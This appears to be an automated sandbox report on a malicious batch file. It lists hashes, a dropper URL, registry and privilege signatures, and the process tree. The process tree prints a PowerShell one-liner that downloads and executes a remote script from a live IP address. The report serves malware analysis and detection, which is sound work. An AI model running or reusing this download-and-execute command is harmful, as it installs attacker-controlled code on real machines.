Analysis
-
max time kernel
105s -
max time network
151s -
platform
windows10_x64 -
resource
win10v191014 -
submitted
11-02-2020 18:10
Static task
static1
Behavioral task
behavioral1
Sample
61qVyZCf.bat
Resource
win7v191014
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
61qVyZCf.bat
Resource
win10v191014
windows10_x64
0 signatures
0 seconds
General
-
Target
61qVyZCf.bat
-
Size
189B
-
MD5
b333d94ab42b4326dd0fd88ed1478a68
-
SHA1
25f722c04783237a8195b64d6c08ea787991c6eb
-
SHA256
ece31cd5ba841084557b618766ee4ec4e36796d0ece6191574a8eb615e01e909
-
SHA512
1cfd9d628a71c3a6558ba135ad295db79c8dec2bbbc438a6a8a0c2cae5465aaa74fccfcc14a1b62cc17f443f6400750a4eba200e2b2ce170a031941b412be2b0
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/61qVyZCf
Signatures
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid process 4292 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 4292 WerFault.exe Token: SeBackupPrivilege 4292 WerFault.exe Token: SeDebugPrivilege 4292 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
Processes:
WerFault.exepid process 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\61qVyZCf.bat"1⤵PID:5008
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/61qVyZCf');Invoke-IGMVZY;Start-Sleep -s 10000"2⤵PID:5052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 7043⤵
- Checks processor information in registry
- Enumerates system info in registry
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:4292
-
\??\c:\windows\system32\taskhostw.exetaskhostw.exe -RegisterDevice -SettingChange -Full1⤵PID:3904